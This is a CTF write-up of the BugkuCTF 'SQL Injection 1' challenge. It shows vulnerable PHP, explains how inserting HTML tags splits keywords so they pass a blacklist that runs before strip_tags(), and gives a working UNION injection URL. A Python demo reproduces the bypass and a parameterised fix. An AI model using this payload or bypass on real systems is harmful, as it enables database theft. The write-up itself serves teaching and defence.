BugkuCTF SQL Injection 1

Foreword

Having worked through the web challenges for a while now, the basic part can be considered finished. Over the next few days I will keep posting solutions for the BugkuCTF WEB section. To keep them readable, each challenge's solution is published as a separate article. Thank you for your continued support, understanding and encouragement~~~

Clicking the challenge link shows the following piece of code:

<?php
// Challenge source as shown on the page (deliberately vulnerable).
// $id is taken from the ?id= query parameter (assumed; the page only shows the filter).
$id = $_GET['id'];

// filter sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
    // case-sensitive substring match against the RAW input
    if (substr_count($id, $value) > 0)
    {
        exit ('Contains sensitive keywords!'. $value );
    }
}

// xss filter (runs AFTER the blacklist check)
$id = strip_tags ( $id );

// $id is spliced into the query as-is: no quoting, no type check
$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";

Above, under // filter sql

The SQL injection blacklist looks strict enough that nothing can be injected at all. But as the saying goes, even the most careful plan has a loophole.

Below, under // xss filter

The strip_tags($id) call gives us an idea for the injection. The blacklist is checked against the raw input first, and only afterwards are tags stripped. So anything that splits a keyword apart for the substring check, but disappears when strip_tags() runs, reaches $query intact. (substr_count() is also case-sensitive, but the solution here does not rely on that.)

First look at the strip_tags() function:

The strip_tags() function strips HTML, XML and PHP tags from a string.

So we can insert tags such as <a> or <br> in the middle of sensitive words like union: the check sees u<a>nion, which matches nothing in the list, and strip_tags() then turns it back into union before it is spliced into the query.

According to the challenge hint, the parameter to access is: ?id=x

The table to read is key and the column is hash (the row with id=1), so we construct the following injection:

http://103.238.227.13:10087/?id=-1 u<a>nion selec<a>t  1,hash fro<a>m .key

After strip_tags() the query becomes SELECT * FROM temp WHERE id=-1 union select 1,hash from .key LIMIT 1. Since id=-1 matches no row in temp, the single row returned by LIMIT 1 is the one from the union, and the hash value is printed directly. That should be the flag we need.
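To make the filter-ordering bug concrete, here is an added example (not code from the challenge or the original post) that models the challenge's filter chain in Python and runs the reassembled query against a constructed in-memory SQLite database. strip_tags() is approximated with a regex that removes anything of the form <...> (PHP's implementation handles more edge cases, but for these payloads the result is the same), the substr_count() loop is modelled as a case-sensitive substring test, and the table contents and flag value are made up. The demo writes the table name as key without the leading dot used in the original payload, because SQLite does not accept that form. The hardened_query() function shows one correct fix: validate id as an integer and pass it as a bound parameter instead of splicing it into the SQL string.

```python
import re
import sqlite3

# Same keyword blacklist as the challenge source (checked before strip_tags there).
BLACKLIST = ['table', 'union', 'and', 'or', 'load_file', 'create', 'delete',
             'select', 'update', 'sleep', 'alter', 'drop', 'truncate', 'from',
             'max', 'min', 'order', 'limit']

TAG_RE = re.compile(r'<[^>]*>')


def strip_tags(s):
    """Simplified model of PHP strip_tags(): remove anything that looks like <...>.
    Assumption: PHP's implementation handles more edge cases; for the payloads
    here the result is identical."""
    return TAG_RE.sub('', s)


def blacklisted(s):
    """Model of the challenge's substr_count() loop: case-sensitive substring
    match on the RAW input. Returns the first keyword found, or None."""
    for kw in BLACKLIST:
        if kw in s:
            return kw
    return None


def challenge_query(user_id):
    """Vulnerable order from the challenge: blacklist first, strip_tags second.
    Returns the SQL string that would be executed, or None if the filter rejects."""
    if blacklisted(user_id) is not None:
        return None
    cleaned = strip_tags(user_id)  # tags vanish, keywords are reassembled here
    return f"SELECT * FROM temp WHERE id={cleaned} LIMIT 1"


def hardened_query(user_id):
    """One correct fix: validate the parameter as an integer and never splice
    strings into SQL. Returns (sql, params) for a parameterised query, or None."""
    if not re.fullmatch(r'-?\d+', user_id):
        return None
    return "SELECT * FROM temp WHERE id=? LIMIT 1", (int(user_id),)


def run(sql, params=()):
    """Execute against a constructed in-memory SQLite database mirroring the
    challenge schema: temp(id, name) and key(id, hash). The flag value is made up."""
    con = sqlite3.connect(':memory:')
    con.execute("CREATE TABLE temp(id INTEGER, name TEXT)")
    con.execute("INSERT INTO temp VALUES (1, 'first row')")
    con.execute("CREATE TABLE key(id INTEGER, hash TEXT)")
    con.execute("INSERT INTO key VALUES (1, 'flag{constructed-sample}')")
    rows = con.execute(sql, params).fetchall()
    con.close()
    return rows


# The page's payload, minus the MySQL-style leading dot on the table name.
PAYLOAD = "-1 u<a>nion selec<a>t 1,hash fro<a>m key"

if __name__ == '__main__':
    print(blacklisted("-1 union select 1,hash from key"))  # plain payload is blocked on 'union'
    print(blacklisted(PAYLOAD))                             # None: every keyword is split by a tag
    sql = challenge_query(PAYLOAD)
    print(sql)                                              # strip_tags put the keywords back together
    print(run(sql))                                         # the union row leaks the hash
    print(hardened_query(PAYLOAD))                          # None: not an integer, rejected
```

Reordering the two steps (strip_tags() before the blacklist) would close this particular hole, but a keyword blacklist on free-form SQL remains a weak control; validating the type of id and binding it as a parameter removes the injection point entirely.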
